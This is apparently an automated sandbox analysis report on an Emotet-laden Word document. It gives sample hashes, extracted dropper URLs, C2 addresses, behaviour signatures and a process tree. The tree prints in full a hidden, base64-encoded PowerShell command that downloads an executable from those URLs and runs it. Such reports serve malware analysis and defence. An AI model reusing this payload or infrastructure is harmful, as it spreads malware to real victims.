Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    25-01-2020 03:27

General

  • Target

    8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc

  • Sample

    200125-1tgg648jy2

  • SHA256

    8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://relprosurgical.com/wordpress/erEIWTG/

exe.dropper

http://compunetplus.com/lacrosseleaguestats/yJpumLt4l/

exe.dropper

https://bbs.anyakeji.com/wp-admin/5MNyBTn4B/

exe.dropper

http://rodyaevents.com/wp-content/t8v9c/

exe.dropper

https://emerson-academy.2019.sites.air-rallies.org/wp-admin/h4u1/

Extracted

Family

emotet

C2

70.180.35.211:80

74.108.124.180:80

85.105.205.77:8080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

176.9.43.37:8080

59.103.164.174:80

70.184.9.39:8080

202.175.121.202:8090

62.75.187.192:8080

217.160.182.191:8080

201.184.105.242:443

78.142.114.69:80

159.65.25.128:8080

104.236.246.93:8080

152.168.248.128:443

24.105.202.216:443

121.88.5.176:443

92.222.216.44:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8d6151eb11f256ed1714c4e63b8647602522740d5b23a060bde1f703259cbe8e.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    PID:4932
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABLAGYAcwBvAHEAcQB3AGEAagA9ACcAWgBuAHEAcwBoAG8AYwBuACcAOwAkAFMAaQBkAGwAYQBnAGcAegBvAHYAbQAgAD0AIAAnADMAMgAzACcAOwAkAFMAagBsAHQAbwB3AGwAdwByAD0AJwBUAGcAYgBuAHIAaQB2AGcAcABqACcAOwAkAFUAegByAGcAZwBnAHkAbAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUwBpAGQAbABhAGcAZwB6AG8AdgBtACsAJwAuAGUAeABlACcAOwAkAEwAbQBwAG4AcwBhAHQAegB6AGUAZQBtAGkAPQAnAEMAegBwAG4AeABvAG0AdQBrAHIAdAB3AHUAJwA7ACQAVwBtAHMAeABrAGYAZgBsAGsAbAA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBjAEwASQBlAE4AVAA7ACQAVABkAGYAdABuAGgAeQBuAHUAYgA9ACcAaAB0AHQAcAA6AC8ALwByAGUAbABwAHIAbwBzAHUAcgBnAGkAYwBhAGwALgBjAG8AbQAvAHcAbwByAGQAcAByAGUAcwBzAC8AZQByAEUASQBXAFQARwAvACoAaAB0AHQAcAA6AC8ALwBjAG8AbQBwAHUAbgBlAHQAcABsAHUAcwAuAGMAbwBtAC8AbABhAGMAcgBvAHMAcwBlAGwAZQBhAGcAdQBlAHMAdABhAHQAcwAvAHkASgBwAHUAbQBMAHQANABsAC8AKgBoAHQAdABwAHMAOgAvAC8AYgBiAHMALgBhAG4AeQBhAGsAZQBqAGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADUATQBOAHkAQgBUAG4ANABCAC8AKgBoAHQAdABwADoALwAvAHIAbwBkAHkAYQBlAHYAZQBuAHQAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAOAB2ADkAYwAvACoAaAB0AHQAcABzADoALwAvAGUAbQBlAHIAcwBvAG4ALQBhAGMAYQBkAGUAbQB5AC4AMgAwADEAOQAuAHMAaQB0AGUAcwAuAGEAaQByAC0AcgBhAGwAbABpAGUAcwAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AaAA0AHUAMQAvACcALgAiAHMAYABQAGwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATQB4AHoAawBhAGgAeQBqAD0AJwBZAHAAbgBvAGMAbwBmAG8AbABzAGcAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABSAHoAYQBuAHcAdAB1AGMAbABrACAAaQBuACAAJABUAGQAZgB0AG4AaAB5AG4AdQBiACkAewB0AHIAeQB7ACQAVwBtAHMAeABrAGYAZgBsAGsAbAAuACIARABgAG8AVwBuAGAATABPAEEARABmAEkAYABMAGUAIgAoACQAUgB6AGEAbgB3AHQAdQBjAGwAawAsACAAJABVAHoAcgBnAGcAZwB5AGwAKQA7ACQAWQBzAGYAdwB6AGQAegBnAHgAcwA9ACcAWQBjAHAAZQBxAHcAcQB5AHoAegBnACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQB6AHIAZwBnAGcAeQBsACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMgA2ADIANQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAYABUAGEAUgBUACIAKAAkAFUAegByAGcAZwBnAHkAbAApADsAJABIAGkAYQB1AG0AYgBkAHoAYgBwAHQAPQAnAFMAegBqAHEAdgB2AGEAZwBsAHYAbwBxACcAOwBiAHIAZQBhAGsAOwAkAFcAbAB6AGwAeAB0AGsAdwBxAD0AJwBHAGUAawB5AGIAYQBrAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBwAGkAawBtAGMAaAB2AG4AbABlAGkAdwA9ACcAQgBkAHYAdABqAHcAagBkAG4AbwByACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3660
    • C:\Users\Admin\323.exe
      "C:\Users\Admin\323.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4756
      • C:\Users\Admin\323.exe
        --9304fa92
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:3860

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3860-10-0x0000000002230000-0x0000000002245000-memory.dmp

    Filesize

    84KB

  • memory/3860-11-0x0000000000400000-0x000000000050C000-memory.dmp

    Filesize

    1.0MB

  • memory/4756-8-0x00000000022D0000-0x00000000022E5000-memory.dmp

    Filesize

    84KB